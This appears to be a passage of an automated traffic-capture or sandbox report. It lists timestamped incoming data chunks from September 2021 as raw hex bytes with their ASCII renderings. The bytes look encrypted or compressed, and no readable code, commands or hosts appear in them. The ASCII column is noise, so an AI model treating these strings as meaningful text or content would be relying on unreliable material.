              2021-09-15 05:14:39 UTC23INData Raw: 1f 4d e9 1e 7f 95 b5 30 3c 12 f1 ff 06 04 c0 db 5c a7 0c 55 c4 b3 5f 7f 5f 2f 78 1b c0 37 72 c8 35 66 18 37 95 ef 14 bb e1 37 e1 49 b2 3c 35 d0 22 87 a0 5e 26 5c ec c6 75 e5 15 64 9d b7 a1 23 33 fe 3c e4 c7 0a a9 01 e0 08 3e fc f6 47 a0 51 9a ac b5 20 11 01 8d 05 fb 18 81 30 ba c7 a5 7e 1a 17 bf 96 c3 e0 0b e9 29 41 79 05 cd 68 17 ee 19 5c b1 33 87 ac 32 5d 9b 7d 60 a6 20 14 73 2d b3 60 68 30 d9 db c7 03 5c c8 43 a7 d1 e3 b8 eb 73 2d 0b 85 f4 49 f3 81 08 7e 35 2b a1 62 53 09 d8 a3 b7 59 86 ee 9e 96 2f 06 29 0f da 50 e0 5d fb f7 fd c7 88 5c f5 c4 1e 4a e7 6d fd 98 3e a2 1a dd 27 9a e8 cd f2 89 06 67 1b 7f ac 59 aa 9c dd 03 80 9b 29 00 be 24 0b 21 58 04 ca 9b ee 14 dd 78 f7 ce c3 a4 58 d9 e8 44 15 94 a0 42 33 30 16 db 74 23 7c 26 1a d6 06 fb 9c bf 3a 5a ef
              Data Ascii: M0<\U__/x7r5f77I<5"^&\ud#3<>GQ 0~)Ayh\32]}` s-`h0\Cs-I~5+bSY/)P]\Jm>'gY)$!XxXDB30t#|&:Z
              2021-09-15 05:14:39 UTC31INData Raw: 0a ff c4 7f 50 d1 13 c7 87 3f 16 6a 6b a9 8a 00 31 90 a8 57 51 6f d6 13 ba c3 87 83 b4 46 16 72 24 51 b8 10 0a 52 f9 f3 28 cb 82 99 40 60 26 d0 b4 53 a1 3f 62 c9 8a 29 53 db 5d 08 8d 7d 7e 9c cf 0f 76 45 d6 09 ca 1f 2e 7b 8f f5 08 d1 90 c2 0d 65 3c 25 12 ac 69 c2 c1 e1 aa d4 91 ef b3 e1 96 dc b8 fd c6 c7 00 43 7b fa e9 87 1a a7 d7 87 7a 5d d7 4f 64 d2 e7 59 d1 34 7e bb 46 68 30 67 09 da cf b5 c2 3e 0a 1f e0 6c fd 1e d5 50 52 7c 9e 6e d3 66 c7 e9 07 72 ac 7f 4b e9 f2 88 ec dd 36 69 09 99 62 49 5b 2e 75 9c 29 63 f8 cb 4e aa 0c 55 a6 fe ea b1 a3 4e 2a 20 d5 aa 48 f2 b4 8c 7b 6e 55 f6 53 f8 6e 75 af 44 a9 38 b3 8a 41 bb bd b9 1f 5c c8 17 10 31 b7 30 36 51 f5 e9 06 28 7d 6f 33 8e 06 26 f7 a1 4b 64 41 a7 e7 3c d1 26 66 a9 44 bc 09 3d 67 7a 05 aa e9 08 85 5e 64
              Data Ascii: P?jk1WQoFr$QR(@`&S?b)S]}~vE.{e<%iC{z]OdY4~Fh0g>lPR|nfrK6ibI[.u)cNUN* H{nUSnuD8A\106Q(}o3&KdA<&fD=gz^d
              2021-09-15 05:14:39 UTC39INData Raw: 01 75 b2 71 3a 33 a1 04 90 ca 59 1c 89 40 2f ed 96 30 14 ff 9f 20 f9 74 b1 c0 79 10 00 42 70 db a3 d7 7d c4 86 b0 cd 18 55 12 be 50 7a cc dd 45 c5 0f c5 59 8b 97 cd c8 bd 97 3e a1 f9 64 52 27 1a ca 26 d3 f8 e9 aa 29 c2 99 90 e3 47 e3 82 9b 12 d5 1c ad ac 10 b7 56 29 46 f4 36 4c 07 7e 56 2a cc 5a 9a c7 5c 3e 6d ef 15 ca 10 47 3b c1 b3 68 b3 65 f3 97 91 0e 37 fd 98 eb af ee fa de d6 53 6e e6 88 42 ef d9 7c e3 30 ee a2 18 61 96 82 9c 63 f0 ea 6c 85 a2 c0 27 c4 04 27 d9 b6 d5 46 6d e8 31 3c c9 15 56 85 2d 2f fd d9 71 fb 70 b0 1a 2a cf b2 73 9f d1 2d 19 04 2d 51 62 e8 0a 10 47 0f 1b 09 14 9c 8e 1f 9c 7e b7 c4 34 2d e7 90 d6 11 1a ff 58 7f 50 d1 80 a0 96 39 3a 71 75 ab a8 3f 63 bb 86 e2 51 69 c7 44 92 4d 97 95 b2 11 30 73 24 5b 90 4c 17 ac fe cc 30 a4 e7 b1 03
              Data Ascii: uq:3Y@/0 tyBp}UPzEY>dR'&)GV)F6L~V*Z\>mG;he7SnB|0acl''Fm1<V-/qp*s--QbG~4-XP9:qu?cQiDM0s$[L0
              2021-09-15 05:14:39 UTC47INData Raw: a2 10 cc 81 e9 cc cc 07 83 15 7d 1c 65 bd 44 c5 b9 dc 03 8a 88 37 1f f8 a9 20 21 40 04 d9 83 e1 01 c2 68 f3 d6 d5 b5 5a 57 5f 6d 14 a5 a3 48 62 29 3e c0 04 23 76 1f 3e 6e 06 fd be 9b 46 66 e9 cf cd 3f 81 3f 03 bb fb 9b c8 8b 06 d6 a0 f5 24 2b 26 26 13 da 48 4f 59 db 13 18 77 e3 b6 89 fd 53 a3 4f 44 9a 75 28 e7 22 bc fc ff 3f 47 f8 6a 9c 9c 47 66 13 3d e0 9e 16 2a 34 2b 50 24 5a 11 d2 04 55 af 23 d0 c9 86 c3 08 c0 f0 f5 31 99 a7 2e 4b 85 3b 8d 43 f7 e5 ea ce 37 72 fb cc be 68 c5 23 8e 3b 28 9e 7c 68 9a 7f d8 96 dc 61 8c b7 55 d1 e1 e3 dc c4 75 ca d9 de 25 a1 ee 53 62 47 04 a0 9d 7f b0 be e8 ed 31 e2 cb 6d 21 61 03 57 02 ec 23 1a 07 7a 12 16 d5 16 9a e6 5e 08 91 4d 01 7e 4a 33 1e d1 60 96 f8 72 93 90 6b 10 0a 71 cd d2 b1 d5 03 63 09 07 d0 dd 67 3c 05 50 51
              Data Ascii: }eD7 !@hZW_mHb)>#v>nFf??$+&&HOYwSODu("?GjGf=*4+P$ZU#1.K;C7rh#;(|haUu%SbG1m!aW#z^M~J3`rkqcg<PQ
              2021-09-15 05:14:39 UTC55INData Raw: 8d 59 2e 2e cb 58 06 69 4a a5 7e a4 28 b6 77 be 42 d5 bb 1d 47 fe 02 18 aa b2 5f 12 01 f5 ef 06 08 5f 68 1b 8a 0c 55 c8 cf 6d 6c 4b a7 de 00 fa 65 64 d7 23 d3 23 3b 4f fa 00 bb e7 4f 23 5f 64 bb c0 85 51 a4 b1 4f 31 5b f4 c5 6d de 98 77 8c a7 df 1a bf 49 12 ef cf 1b a4 1d ec 0b 3e f0 f4 5b a0 41 a3 bf db 05 16 6e a1 14 ed 0f 86 11 89 85 a1 74 34 2f 97 94 c5 ce 22 fa 20 28 0e 7c cd 62 c3 e8 2b 7d a6 3d 07 a6 21 17 28 c7 60 a6 35 08 d6 3e b3 60 63 fd c0 cd f9 1a 6d d7 53 8f b3 fe b8 e1 70 5e 2f 84 e6 43 e0 98 0f 66 24 30 e6 46 52 09 c7 b0 ab 48 8f f9 44 80 ea bb 06 0f ee 50 f3 40 6b e3 ec c4 8f 5c 24 ed 91 5c f6 7e d5 93 34 bb ee cd 17 e0 e4 e2 f0 83 13 57 10 76 b6 44 d4 b2 cb fd 8b a4 34 07 ed a2 20 30 53 1f 27 82 d3 43 e2 68 e2 d6 d5 38 6b 57 5f 6d 05 83
              Data Ascii: Y..XiJ~(wBG__hUmlKed##;OO#_dQO1[mwI>[Ant4/" (|b+}=!(`5>`cmSp^/Cf$0FRHDP@k\$\~4WvD4 0S'Ch8kW_m
              2021-09-15 05:14:39 UTC62INData Raw: 3a 54 a9 f0 17 07 9a 9a 1a 8f 48 ea c5 18 34 99 80 c7 15 7f 33 7e 7f 5a f3 44 a7 87 35 1f 5f 7c b8 a5 13 10 94 b7 eb af 6e fa 48 ab c7 81 43 ab 7a a0 7e 37 56 b8 09 10 b3 f1 21 38 99 f3 9f 49 0b 04 fe b4 59 c4 9b fa c9 80 05 92 c8 57 13 91 83 6e b7 d3 d9 c7 69 d0 19 c5 17 32 60 91 0b 18 fa 93 42 6d 49 35 09 4d b6 6a c4 cd 86 db d3 91 fa 9c d9 9c 22 b3 51 a9 cf 09 6f 45 f6 e9 85 01 46 dd b8 7f 45 ca 48 75 32 18 74 f4 12 2e da 46 6e 38 6a 32 a2 ce a4 cf 36 fd 12 cc 67 f9 f3 d3 7c 4b 53 2d 90 d2 4c c0 e5 0e 1d 6d 65 b5 e2 cd 89 d9 60 31 69 1e 85 74 b7 52 1a 8d 9f 16 6a cb 58 48 aa 17 d2 d2 00 eb 99 b9 55 39 2f c3 45 4e c1 bb 65 76 42 5f c2 5f 3e 65 a6 52 90 a4 2a fa 45 bb 44 f4 92 1f 47 77 13 10 aa c7 55 37 03 ff fa 11 11 48 03 c4 89 0d 5f b0 c7 4b 6e 4f 2f
              Data Ascii: :TH43~ZD5_|nHCz~7V!8IYWni2`BmI5Mj"QoEFEHu2t.Fn8j26g|KS-Lme`1itRjXHU9/ENevB__>eR*EDGwU7H_KnO/
              2021-09-15 05:14:39 UTC70INData Raw: c1 71 b2 97 6c a1 f9 43 e8 31 ee ab e1 31 67 21 9f 09 fd 2d 64 b4 14 aa 1d a1 0e f5 6c 44 1b 9c 4b 68 dd 97 30 14 b8 83 22 f9 78 8a e3 0a 32 08 6a d8 c9 aa cc 1b 7a 8d df e3 05 4f 3c 14 59 6b c1 9a f3 c4 0f c5 60 a6 bf 7e c6 95 be 51 8b f1 48 48 31 0c f8 59 6a f8 ef cf 29 50 9a 96 e3 7e ce ed 83 19 fd b8 72 b9 3f f0 ce 28 46 f4 22 2f c4 c5 56 20 d5 5d 8a fe 5d 3e 67 23 1b e4 8b 41 11 cb be 60 8b 3d f3 97 97 2d 33 03 93 c2 01 f4 fa d4 ff d9 5d e2 8e 44 cb d9 7c c9 18 63 b2 30 fc 85 87 87 64 ac e8 6d 85 a9 bb f1 ec 91 2c ca b1 82 fd 6c e8 3b 27 1a 68 bc b2 2d 25 df 6d 5f f9 7a a5 17 13 f0 9a 6d 96 0f 2b 0e 2a 39 79 f1 fb 0a 16 51 82 1c 09 0e 87 9a 19 92 56 14 c5 2f 17 8c 85 f5 11 10 d7 5f 7f 50 ca bb 31 87 3f 18 42 61 bd 8a 86 00 93 a2 8f 48 6e d6 48 b0 1d
              Data Ascii: qlC11g!-dlDKh0"x2jzO<Yk`~QHH1Yj)P~r?(F"/V ...g#A`=-3]D|c0dm,l;'h-%m_zm+*9yQV/_P1?BaHnH
              2021-09-15 05:14:39 UTC78INData Raw: cd 8b ee 1f 8e 31 cc 2a 99 4f 2f dd 1c 43 a9 1d 8a 36 a3 b3 17 d9 ed fa cb dd f5 92 1d 52 8d 74 b8 52 ed 86 dd 03 80 a2 37 1f fe ba 10 23 58 2f d9 83 ff 05 c2 68 f7 c0 de 9e 5b 57 58 7b f1 94 8c 4a 3a 23 3e c7 63 dd 77 22 4f c3 0d fd b3 89 c6 5b c5 cd ec 15 72 df 00 aa 86 ab e2 e1 f8 dd a7 f2 22 33 cb 3d 12 aa 48 91 4d 4a 3b 2f 66 f5 af 9e d2 11 a8 76 78 82 8b 23 16 25 b9 e2 01 43 7f ee 94 97 d4 b3 56 0a 28 f3 f1 3a 2e 2d df 5d 00 33 b3 b9 2e 45 b1 2e c3 d6 94 c7 fb f9 1e f6 29 8a b2 20 4b 8c b7 60 47 a5 da fd dd 39 5a 33 cb a4 90 d5 0a a4 34 2a b5 cc 69 9f 49 ce 92 c1 a8 87 93 6a c4 e6 f7 af c0 26 d6 da de 27 cd 53 84 f3 23 10 b9 95 68 7d dd f9 e5 00 00 df 4c 23 57 2d 8c 70 e0 25 75 07 7b 12 0d b7 17 95 de 26 17 96 5c 07 47 99 2f 2d 29 0e 0f d8 70 e2 2c
              Data Ascii: 1*O/C6RtR7#X/h[WX{J:#>cw"O[r"3=HMJ;/fvx#%CV(:.-]3.E.) K`G9Z34*iIj&'S#h}L#W-p%u{&\G/-)p,
              2021-09-15 05:14:39 UTC86INData Raw: c1 4c 63 a1 2e fb c6 fe ec c6 e3 40 2a 22 b9 45 42 c8 48 98 64 66 4c e1 76 11 47 77 af 6f aa 11 ea f9 c2 44 ba 92 37 59 f9 13 1a c8 ed 32 36 09 8f 37 19 12 42 92 25 c5 0d 55 cc cf 1c 6e 4b ab 13 01 fa 4a 60 d7 23 9a 18 3d 67 a6 05 aa e5 28 2d 76 0c b1 1e d6 04 97 b6 65 37 49 ed d4 64 f4 cf 45 8c 1d 5c 32 b3 49 14 fe c6 19 93 76 c8 98 3e f6 e5 14 b1 44 9a ab d7 3d 6d 01 87 16 ed 00 8b e6 a0 ea ad 7c 2a 47 a1 07 59 d5 28 eb 20 5a e8 7c e1 60 15 e4 09 48 00 a1 19 a1 32 14 40 83 61 8a 37 0c e9 01 a8 f1 f5 3f cf ca da 08 b9 d6 7f 87 fa f4 bf fb e1 c2 34 89 f4 4a f7 66 18 4b 26 28 c3 47 5b 11 2c b1 87 47 97 fa 3a ae f9 8b 06 60 46 50 f3 46 e1 fa e1 d5 90 56 d1 d4 2f 55 ec f3 fe 82 3f a3 1c d6 36 e9 c5 da 0c 82 39 7f 1d 68 bd 4d db 47 dd 2f 88 a3 32 27 80 56 df
              Data Ascii: Lc.@*"EBHdfLvGwoD7Y267B%UnKJ`#=g(-ve7IdE\2Iv>D=m|*GY( Z|`H2@a7?4JfK&(G[,G:`FPFV/U?69hMG/2'V
              2021-09-15 05:14:39 UTC94INData Raw: 7a 05 7b 8f 08 3c ca e1 63 9d d1 2f 67 86 3b 79 fa e2 d0 ae 86 89 03 05 07 98 9a 1a 8d 4a ea c5 18 3a 8a fe d8 10 10 d3 7d 04 40 da 93 a2 91 3d 69 50 74 ab a6 9d b6 fc 01 e0 51 65 cb 51 bf c3 87 90 ae 80 be 5e 27 46 ab 1d 17 bd fd c0 2e 4b e0 b5 42 4f 0b c7 5d ae 54 f9 d0 da ba 2c 4d d2 5f 00 96 5b 7f b0 d9 25 bd 55 d7 0f d2 3e 25 5b 57 0f 09 fb f8 3f 6e 65 36 5b 49 cd 68 c2 cd 93 de de a9 3e 9a c6 96 de c9 6d a4 c7 04 41 49 e1 e8 8f 07 4a c6 ba 68 2b fb 1f 27 cd 1b 32 bd fd 01 d8 46 6a 4f 60 20 a5 ca b3 d6 f7 2b 98 e2 64 eb c0 d4 74 5a 54 6e 78 2d 61 da 0a 0a 61 a3 67 ce f8 df 8f c0 75 29 63 d9 aa e5 4b 53 3c 98 90 07 14 c0 4a 4f ae 00 ca c8 28 c2 a2 bb 42 20 3b cd 56 32 ce b7 9b 73 68 42 f9 8c 2e 78 58 ad 65 bf 05 e3 0e ae 45 ba 97 19 58 ec c5 38 ac b5
              Data Ascii: z{<c/g;yJ:}@=iPtQeQ^'F.KBO]T,M_[%U>%[W?ne6[Ih>mAIJh+'2FjO` +dtZTnx-aagu)cKS<JO(B ;V2shB.xXeEX8
              2021-09-15 05:14:39 UTC101INData Raw: d4 09 a2 9e 41 d4 e7 86 9b c3 5d 1a d6 c1 2f dd 5f 52 73 49 6b 4c 9c 53 83 d3 8a c4 30 e8 dc 4e 6e 66 2b 86 29 0d 21 75 b4 53 a2 1e a1 0e b2 c2 45 1b 9c 33 9f 56 96 3a 71 82 0e 23 f3 54 85 f7 7d 10 1b 6e c1 d5 5d dc 3e 64 85 cb ef 06 4f 3e 6a ae 7a c6 ff ca d6 1c c7 71 be 93 d5 3c 94 94 26 89 2d 4a 4e 26 2d 87 0f 68 f2 c9 fb 22 52 9a e3 87 6d c7 88 90 01 ee b6 ac bd 1e c2 07 29 6a ea 33 58 9f 7e 56 24 d8 22 49 c6 5d 3f 02 4c 1b e2 ab 5d 28 cf be 70 9f 22 fe 69 96 31 27 eb aa 20 10 ee fc bb 63 c2 6d ec b4 9b cb d9 7c f6 16 70 a7 18 7a 81 9e 73 67 a8 90 6e 9d b4 b3 95 b1 06 2d c0 c6 c5 e5 6d ec 2b 3e c0 7a 85 81 32 29 2b 44 5d e9 52 fd 1c 3b c2 9c 7b 94 be 3e 09 00 33 74 ef e6 19 12 51 93 18 15 ea 9c b6 05 a8 56 10 c4 34 aa a3 85 d6 10 1a ca 6c 7b 50 ca 97
              Data Ascii: A]/_RsIkLS0Nnf+)!uSE3V:q#T}n]>dO>jzq<&-JN&-h"Rm)j3X~V$"I]?L](p"i1' cm|pzsgn-m+>z2)+D]R;{>3tQV4l{P
              2021-09-15 05:14:39 UTC109INData Raw: 61 4b e5 cc 47 58 66 04 b2 ab 42 b3 fb 3f c0 f8 8b 06 60 0d 53 f3 4a f9 ed c7 c2 8b 41 07 0d 01 5c fc 6d d3 8a 2e a4 7f d9 3b e9 c6 a3 9d 81 15 77 2c 77 b3 6c 1c bb dc 09 a7 68 e9 11 ec a7 de 37 74 05 d9 98 90 57 c2 68 ec 0a d7 ce 7f 56 5f 68 83 d4 a0 48 20 37 0e 4c 34 23 76 0c 22 0e 04 fd be bd 34 52 c1 d4 c2 17 5f 53 ce bd ec fe d3 83 69 0e 8d f2 28 0a fa 29 12 da 4a 91 00 ff 0a 51 76 ed bc 9a f9 55 bb 57 7f 9a 00 22 3a 2b bd fc ff 41 79 d0 7d 96 b4 95 67 04 46 b3 f0 2b 2e 36 37 21 6a 34 a5 d7 06 49 df 6d c2 c7 94 d2 06 85 7a f4 31 9d b4 5b 12 89 a1 9a 42 e6 02 e8 ce 37 58 27 b2 f7 6f d4 22 a4 11 2c e3 3c 7e f5 46 da 94 ad 3a 8b 9f 45 bf dd e8 cd c8 31 33 da de 23 ce 5b 52 42 0d 2b 9a 0c 7f ab db 46 91 72 e9 d8 62 32 65 50 cf 00 ec 21 62 68 6c c4 91 8a
              Data Ascii: aKGXfB?`SJA\m.;w,wlh7tWhV_hH 7L4#v"4R_Si()JQvUW":+Ay}gF+.67!j4Imz1[B7X'o",<~F:E13#[RB+Frb2eP!bhl
              2021-09-15 05:14:39 UTC117INData Raw: 67 b5 e2 b1 73 c5 73 30 7e 60 50 6c 49 59 59 75 9c 05 69 c3 44 5e a7 69 29 c5 fe ec a3 d5 90 28 28 c9 3b b5 df b6 9d 6f 01 8f eb 5a 0c 00 a7 ac 6f aa 13 ef 64 b0 3a f6 92 1f 43 e9 1c 38 a7 b6 30 30 10 fe 9a 35 02 4e 6a 20 98 1c 45 c6 cf 63 6c 4b a7 de 18 c3 2a 48 fa 20 bc 0f 11 61 fe 07 ac c7 cc 39 5e 6e de 3a d2 22 80 a2 5f 26 43 d5 f9 61 f6 c9 5d a2 a3 b0 34 95 a5 16 fe cc 65 85 70 c8 0f 2f e6 e6 3d 9b 46 8b bb dc 14 00 6e 9f 17 ed 03 49 17 84 ee 92 74 32 4a ae 82 ed f0 25 eb 23 99 16 6c c7 7f cb ee 04 44 9b 2c 10 92 47 e3 a4 82 71 b3 28 d2 ed 13 a2 75 78 35 4c 7d ec f9 ba 28 ac 89 d8 e2 f9 d5 70 5e 2f 84 f4 43 b3 98 19 67 2f 30 ce 47 0c 09 d2 b0 b9 48 95 f9 5e 81 f9 8a 02 0f da 51 6e 40 ea e3 81 d4 99 4f 25 d7 03 5c f9 7e d5 82 25 a2 10 cd 20 d9 c5 cc
              Data Ascii: gss0~`PlIYYuiD^i)((;oZod:C8005Nj EclK*H a9^n:"_&Ca]4ep/=FnIt2J%#lD,Gq(ux5L}(p^/Cg/0GH^Qn@O%\~%
              2021-09-15 05:14:39 UTC125INData Raw: ee 82 53 53 ba ed e0 4d 54 31 2d c4 e0 b1 a8 3f 03 f5 f9 71 fb 7a 83 ff 33 c8 9a 72 91 f9 06 0a 00 3f 53 76 95 93 17 51 86 3c b4 14 9d 9a 91 ad 7b 06 e2 14 9a 88 85 d6 31 ff df 7f 7f 4f c0 bb 8b 85 3f 14 6a f7 d5 3b 12 01 97 88 5e 51 6f d6 d8 9f ee 87 b3 98 c0 bf 72 24 71 b2 11 17 ac e2 f7 14 b7 e1 9f 6a e2 70 66 b5 53 af 26 45 c9 8a 29 d7 f2 70 12 b0 a3 c0 b0 c8 27 e6 4b df 0f d6 0c 0f 5b bb 09 09 fb a1 3a 12 fc 3d 21 3e 92 aa c2 c7 9f 52 f1 bc f9 bd e6 56 dc b2 7d 85 e8 09 47 61 e9 e6 a7 20 5b d6 ad 52 c7 a5 d6 6d cc 1d 78 3c 3a 00 d8 dc 4d 19 61 07 85 0f b5 c8 21 23 2d e9 64 e1 fb fc 51 58 54 37 44 55 1e 55 f5 0b 76 84 a7 b5 e8 de 15 e1 5e 24 4f 2f 40 6e 49 53 16 c8 94 05 6f cf 68 67 87 04 d5 c2 d4 68 cb 23 43 2a 2c e3 97 49 de b6 01 52 43 4c cf 7a c5
              Data Ascii: SSMT1-?qz3r?SvQ<{1O?j;^Qor$qjpfS&E)p'K[:=!>RV}Ga [Rmx<:Ma!#-dQXT7DUUv^$O/@nISohgh#C*,IRCLz
              2021-09-15 05:14:39 UTC133INData Raw: ce 1d 99 3a cf be 70 fc 0b a4 1f 2e b4 f0 01 6c 43 d8 92 f6 d8 8b 9f 41 4a c4 c4 df e4 7d ba db de 23 ee 90 4a 62 4d 6f ae b5 52 a9 d1 f7 c6 b7 96 41 67 30 63 0b 27 00 ec 25 ef 97 56 00 3a 81 af 9b e6 45 3b 71 44 07 56 89 2d 36 fa 0d 23 ff 58 1b 9a e0 11 0a 6e fe 76 a2 dd 12 f1 a2 9d d6 21 6f 96 04 50 7a e6 f1 cc c6 0f dd 59 82 95 cd c4 bf 3e 40 38 f2 48 4a 00 a8 d1 0e 68 62 cc 8d 13 74 ba 3d e4 6f c7 a2 97 01 fd b2 b3 a5 32 f5 fb 28 40 d4 b3 5d 2e 7e 56 24 ff f8 a3 c6 5d a4 48 d0 08 c4 81 e8 3a cb be 41 8e 24 f3 97 8a 35 1e e0 82 c5 3e 6c 84 4d ff c2 69 c6 21 6b cb d9 e6 cc 35 72 85 38 c4 84 87 8d 46 98 98 6c 85 bd 87 cb c6 04 2b e0 3d 93 7d 6c e8 35 0d 74 7b 94 85 b7 00 f8 57 57 db ca a2 1d 3b e8 be 74 9c d1 34 03 28 14 7b f0 ed 20 90 2f 1b 1d 09 10 bd
              Data Ascii: :p.lCAJ}#JbMoRAg0c'%V:E;qDV-6#Xnv!oPzY>@8HJhbt=o2(@].~V$]H:A$5>lMi!k5r8Fl+=}l5t{WW;t4({ /
              2021-09-15 05:14:39 UTC140INData Raw: 4a 13 47 d3 73 17 f0 e2 b8 7b 55 73 3e a2 d4 db e2 98 19 47 f3 16 ce 47 4a 21 ff b2 ab 4e bf 7b 3a 18 f8 8b 06 2f 43 53 f3 40 70 c6 c1 c4 bf 6f b6 d7 03 5c d6 a7 f3 82 3f b5 38 e1 39 e9 ca e6 70 fd 8c 7c 0a 61 9d de c7 b9 dc 99 af a5 26 39 de 33 22 21 58 25 03 a5 ff 00 da 40 cb d4 d5 b3 6a d5 21 f5 0e 95 a4 68 b9 2a 3e c0 ef 06 5b 1f 6b f4 9d ff b4 91 18 86 cf cf c7 0b 71 11 01 bd ea de 77 f5 9f dd 8d f6 02 bc f9 39 12 40 6d bc 5c d8 1b b3 75 e3 bc ba 1b 73 a8 67 6b b2 58 20 3a 2d 97 7e 81 d8 7a f8 6e b6 29 9d 65 13 a1 d2 dc 3a 0c 14 bc 5e 2c 35 85 30 22 5f a2 34 eb ea 92 d0 03 d2 b0 8b a8 98 b6 24 7a 16 a3 9e 46 13 fc c7 df 1b 7a bc cd be 6e f4 cd 80 1f 28 89 5e 52 f7 42 de bc 54 0c 13 9e 41 d4 c1 76 cf c2 5d 8a ff f3 32 e8 7b cd 60 4d 70 92 71 59 ab d1
              Data Ascii: JGs{Us>GGJ!N{:/CS@po\?89p|a&93"!X%@j!h*>[kqw9@m\usgkX :-~zn)e:^,50"_4$zFzn(^RBTAv]2{`MpqY
              2021-09-15 05:14:39 UTC148INData Raw: a8 a6 4d d7 40 44 2a cc e2 f2 89 69 9c 29 91 bb 1f 7e eb 28 e3 a6 9b c8 91 2e 2e 10 5b d4 23 12 02 7e 9b eb 5f 2c 91 12 0b f7 47 b6 a0 98 d9 9b d3 21 55 47 ed 30 29 ac d0 a4 52 1a 27 9c 26 25 52 3e 80 00 9d 1d fa 6e a3 2b 9e 84 37 40 ff 09 1a b9 ad 7f 11 0a e7 ff 1f 17 42 62 21 9f 1a 11 91 ba 59 6e 55 fc da 1f d1 33 2e bd 00 95 2d 12 3d 92 31 d8 d1 42 41 38 45 9c 37 ef 17 bf 87 74 55 36 db b7 4a 84 93 29 98 9a 8b ec 73 8f c9 7d 3d df 7e b5 51 89 e4 62 3f fb 1e f3 3a 28 4e b6 a5 fe 55 cb 35 d0 43 dd 59 02 75 8c d8 8b 5c 6a 25 29 cd 35 ed a8 f8 9c 26 89 c4 24 fd bf 67 ce fd 6c fa fc ad 9f d1 74 c9 e4 0a b0 6b be b0 8e 45 54 51 9d c1 6b f1 01 67 69 30 7e d7 f3 a5 1f 79 9f 59 0b 9e f6 8c a7 57 d7 c2 bb 4a 2a 35 e7 28 50 a9 0a 48 24 ad 8b 6f f4 40 ff 11 79 47
              Data Ascii: M@D*i)~(..[#~_,G!UG0)R'&%R>n+7@Bb!YnU3.-=1BA8E7tU6J)s}=~Qb?:(NU5CYu\j%)5&$gltkETQkgi0~yYWJ*5(PH$o@yG
              2021-09-15 05:14:39 UTC156INData Raw: a7 14 9d 65 1e fe 68 14 fe d0 f4 65 8a 87 71 c5 8d a0 e8 c9 12 23 df ae a4 d4 64 e1 1e 2c cd 61 a6 98 39 3b e5 59 69 e8 63 a3 46 30 e0 b1 4b a7 f0 13 36 6c 39 4b d4 c9 28 3c 60 b1 26 3d 3e 8e aa 33 b0 68 13 ed 15 14 ac 9c e2 d2 d7 3c ba b8 9a 19 4a 2a 65 fc d0 89 a7 61 73 da 94 66 70 37 82 fd 26 91 60 1f 66 40 6c a5 7f 96 db 9a 5e f8 fe 49 12 28 c8 54 14 76 a8 8e c6 04 46 a7 71 f4 0c 30 79 cf f0 06 af f5 6e 62 84 2e 50 e1 6e d9 5a 8b 52 87 a4 fd 10 be 8d 76 1e 23 da fc ac b3 86 22 fe 55 5a 1b 17 6f 07 76 02 22 10 75 12 df 2b 6f a9 f7 c7 45 5b 72 a3 f3 75 1e e2 fe 61 fe c6 7e b0 c9 41 84 b7 67 f6 c9 93 3b 7e e4 88 f5 cc 6c 4d 52 ac 31 ae b2 bd 39 12 0b 4b 35 89 31 86 a6 42 03 f8 3b e2 b7 8e ce 83 18 49 08 69 e2 4a 30 2d 51 fa f3 65 04 b2 0e 29 d3 72 b8 b3
              Data Ascii: eheq#d,a9;YicF0K6l9K(<`&=>3h<J*easfp7&`f@l^I(TvFq0ynb.PnZRv#"UZov"u+oE[rua~Ag;~lMR19K51B;IiJ0-Qe)r
              2021-09-15 05:14:39 UTC164INData Raw: c8 b5 d0 05 f8 32 f5 32 99 f0 23 04 83 63 91 63 89 d9 ea ce 3d 59 22 c9 a6 79 f1 d7 a4 3a 28 9e 76 7f f5 41 d8 d0 d5 2b 81 2a 4e f5 e1 e9 cd c2 5d 13 da 98 20 81 50 4a 6d 68 70 b2 9d 7f ab d2 f1 aa 32 b6 d3 a4 3f 42 2b 8c 01 ec 25 76 b2 7d 0a 0b 84 f5 98 c3 45 1b 96 5c 07 55 96 76 1d 8e 04 ea f6 57 99 e4 79 10 0a 69 de 9c a0 92 19 bd 88 95 c7 07 4f 3a 05 53 7a 80 f6 8b cd 8c cc 54 af 04 57 c2 95 b8 3e b0 eb 55 6b a6 05 f5 0e dc da e9 a0 01 52 9c 88 f2 4a d4 82 be 18 4d 28 ac ac 1a d8 ea 28 d1 ff dc 2c 92 7f 22 bb df 56 a2 c6 4c 3e 64 fa 9f e2 84 46 27 54 be 61 9b 3d e2 97 53 1c de ed a7 c3 64 71 fa d4 fe c2 7c e6 b1 6d 4d d9 59 e9 80 c2 a3 18 6b 85 96 8d f1 85 e5 7c a0 a3 7b 44 c4 04 2d ca aa ed 73 6c 7a 21 08 c4 e6 37 85 2d 25 d5 54 71 f2 7d 31 0d 1e c8
              Data Ascii: 22#cc=Y"y:(vA+*N] PJmhp2?B+%v}E\UvWyiO:SzTW>UkRJM((,"VL>dF'Ta=Sdq|mMYk|{D-slz!7-%Tq}1
              2021-09-15 05:14:39 UTC172INData Raw: 3d 07 ac a4 1d 7e 6a 86 a4 42 04 ea 16 b1 60 69 23 54 ca 46 11 a1 d5 2e 8f c4 f2 ba e1 70 5e b9 84 bb 54 06 9a 64 67 73 20 cc 47 52 09 44 b0 74 4b 73 fb 39 81 81 9b 00 0f da 51 65 40 7c fb 0a d7 e4 4f b6 c5 01 5c f6 7e 43 82 36 a6 f6 ce 46 e9 77 dc f0 83 15 7d 9c 65 df 5e 23 bb a1 03 56 98 35 1f fe a9 b6 21 6b 01 3f 81 82 00 3f 78 e4 d6 d5 b5 d6 57 7e 77 e9 97 dd 48 3c 39 3c c0 75 23 e0 0e 2a d0 e0 ff c9 91 07 4b eb cf c7 17 cf 3c ec a2 0a f6 88 8b 66 cd 8f f2 22 20 6d 39 83 de ae 93 30 fe ba 3e 75 e3 bc 9a 6f 55 a4 46 9a 98 08 22 98 3a bf fc ff 41 ed f8 d1 92 52 9d 18 13 ff e6 f3 2b 2a 34 b7 5c 13 14 43 d1 79 5f 44 3b c1 c7 90 d0 93 f8 d7 f1 d7 9b cb 20 5d 9a a3 9e 46 89 4f ea 67 1c bc 20 b2 be 47 c6 24 a6 1f 28 08 76 69 f0 a4 da eb d6 39 98 9d 41 d0 e1
              Data Ascii: =~jB`i#TF.p^Tdgs GRDtKs9Qe@|O\~C6Fw}e^#V5!k??xW~wH<9<u#*K<f" m90>uoUF":AR+*4\Cy_D; ]FOg G$(vi9A
